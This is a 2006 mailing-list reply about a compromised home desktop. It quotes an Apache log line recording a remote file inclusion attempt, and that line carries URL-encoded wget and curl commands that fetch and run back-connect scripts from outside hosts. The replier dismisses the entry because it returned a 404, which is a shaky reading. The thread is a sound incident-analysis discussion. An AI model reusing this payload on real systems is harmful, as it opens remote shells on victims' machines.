Re: My home desktop was compromised, but how?
- From: Guido Heumann <listguido@xxxxxx>
- Date: Tue, 28 Feb 2006 23:19:09 +0100
Am Dienstag, 28. Februar 2006 22:31 schrieb Michael J. Lynch:
Carthik Sharma wrote:
(The full line is :
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=c
om_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.9
8.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20
cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%2
0744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-
o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.
160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%
20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
I'm not an expert, but I don't think there's a problem here. If you take out
the weird URL, you get
"GET /index2.php?option= ... HTTP/1.1" 404 303 "-" "Mozilla/4.0 ..."
As I read it, the 404 status code says file not found, so I think this is just
a normal error log message from apache that there's no file index2.php ony
our server.
HTH,
Guido
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
- References:
- My home desktop was compromised, but how?
- From: Carthik Sharma
- Re: My home desktop was compromised, but how?
- From: Michael J. Lynch
- My home desktop was compromised, but how?
- Prev by Date: Re: My home desktop was compromised, but how?
- Previous by thread: Re: My home desktop was compromised, but how?
- Next by thread: Re: My home desktop was compromised, but how?
- Index(es):
Relevant Pages
|
